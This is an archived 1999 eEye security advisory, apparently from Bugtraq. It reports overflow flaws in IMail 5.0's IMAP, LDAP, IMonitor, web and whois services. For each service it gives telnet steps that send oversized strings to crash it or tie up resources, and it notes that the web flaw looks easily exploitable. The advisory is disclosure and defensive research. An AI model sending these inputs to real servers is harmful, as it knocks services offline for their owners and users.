exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

eeye.99-03-01.imail

eeye.99-03-01.imail
Posted Sep 23, 1999

eeye.99-03-01.imail

SHA-256 | 61b70b7edc28bf04b4e52aac409a46fa8c868c6ebbfadb429f5955bf82afa9be

eeye.99-03-01.imail

Change Mirror Download

From marc@EEYE.COM Wed Mar 3 03:00:41 1999
From: Marc <marc@EEYE.COM>
To: BUGTRAQ@netspace.org
Date: Mon, 1 Mar 1999 23:30:21 -0800
Subject: Multiple IMail Vulnerabilites

[The following text is in the "iso-8859-1" character set]
[Your display is set for the "US-ASCII" character set]
[Some characters may be displayed incorrectly]

________________________________________________________________________

eEye Digital Security Team <e>
www.eEye.com
info@eEye.com
March 1, 1999
________________________________________________________________________

Multiple IMail Vulnerabilites

Systems Affected
IMail 5.0

Release Date
March 1, 1999

Advisory Code
AD03011999

________________________________________________________________________

Description:
________________________________________________________________________

The following holes can be used as a Denial of Service against the
various services mentioned and in some cases used to remotely execute
code.

---> Imapd (143)

The imapd login process does not do proper bounds checking on usernames
and passwords.

* OK IMAP4 Server (IMail 4.06)
X LOGIN glob1 glob2

Where glob1 is 1200 characters and glob2 is 1300 characters. The imapd
service will crash with the usuall overflow error.

---> LDAP (389)

Telnet to server.com 389
Send: Y glob1
hit enter twice
Server Returns: 0
Send: Y glob2
hit enter

Where glob1 and glob2 are 2375 characters and Y is Y. The ldap service
goes to 90 percent or so and idles there. Therefore using up most
system resources.

---> IMonitor (8181)

Telnet to server.com 8181
Send: glob1
hit enter twice

Where glob1 is 2045 characters. The IMonitor service crashes with the
normal overflow message.

---> IMail Web Service (8383)

Telnet to server.com 8383
Send: GET /glob1/

Where glob1 is 3000 characters. The usual overflow message will be
displayed. This one looks to be easily exploitable. >:-]

---> Whois32 Daemon (43)

Telnet to server.com 43
Send glob1

Where glob1 is 1000 characters. The usual overflow message will be
displayed. Ya... starting to sound old.

________________________________________________________________________

Vendor Status
________________________________________________________________________

Vendor has been notified, Waiting for response...

________________________________________________________________________

Copyright (c) 1999 eEye Digital Security Team
________________________________________________________________________

Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.

________________________________________________________________________

Disclaimer:
________________________________________________________________________

The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
http://www.eEye.com
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close